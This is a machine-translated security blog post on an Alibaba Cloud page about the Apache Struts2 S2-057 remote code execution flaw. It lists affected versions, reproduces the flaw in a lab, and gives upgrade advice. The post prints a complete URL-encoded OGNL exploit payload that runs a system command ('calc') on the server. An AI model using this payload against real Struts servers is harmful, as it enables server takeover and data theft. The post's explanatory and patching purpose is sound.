Home > Developer > Web Develop

Website Apache Environment s2-057 exploit POC Remote execution Command Vulnerability replication

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

s2-057 vulnerability, was exposed on August 22, 2018, the Struts2 057 flaw in the remote execution system commands, especially the use of Linux system, Apache environment, the impact of a large scope, high harm, if the XXX by the use of direct access to the server administrator rights, Web site data is tampered with and database theft occurs.

At present we sine security to the s2-057 vulnerability test, found that the affected version is Apache Struts 2.3–apachestruts2.3.34, Apache struts2.5–apache Struts2.5.16 series version. The official Apache has urgently fixed the s2-057 bug.

Through foreign exposure of the loophole POC, we introduce the next Struts2 vulnerability to how to use:

s2-057 vulnerability generated in the Web site configuration XML, there is a namespace value, the value does not do a detailed security filtering results can be written to the XML, especially the URL tag value is not a wildcard filter, resulting in the ability to execute remote code, as well as system commands to the server system.

We first set up a struts2 environment, find a Windows Server, use one-click Deployment Tools to deploy a test environment, Vulhub environment is also set up as follows:

The following is the process of exploiting and reproducing Struts2 vulnerabilities:

Visit website 192.168.0.3:7080/struts2/${(sine+sine)}/actionchain.action

Change the contents of ${(Sine+sine)} to exp,exp content as follows:

%24%7b (%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%23a%3d%40java.lang.runtime%40getruntime () . EXEC (%27calc%27). getInputStream ()%2c%23b%3dnew+java.io.inputstreamreader (%23a)%2c%23c%3dnew++ Java.io.BufferedReader (%23b)%2c%23d%3dnew+char%5b51020%5d%2c%23c.read (%23d)%2c%23jas502n%3d+% 40org.apache.struts2.servletactioncontext%40getresponse (). Getwriter ()%2c%23jas502n.println (%23d+)%2c% 23jas502n.close ())%7d/actionchain.action

Copy the exp content to the browser execution and discover that the server will run the calculator directly such as:

s2-057 Bug Fix Recommendations:

Upgrade to the latest version of Apache struts 2.3.35 or the latest version of Apache struts 2.5.17, directly upgrade can be officially done by the bug patch, fully compatible.

Website Apache Environment s2-057 exploit POC Remote execution Command Vulnerability replication

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
linux remote command execution php cgi remote code execution vulnerability ssh remote command execution example struts vulnerability exploit apache struts exploit apache environment android remote root exploit
Related Article
Jwt+asp.net MVC timestamp prevents replay attacks

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More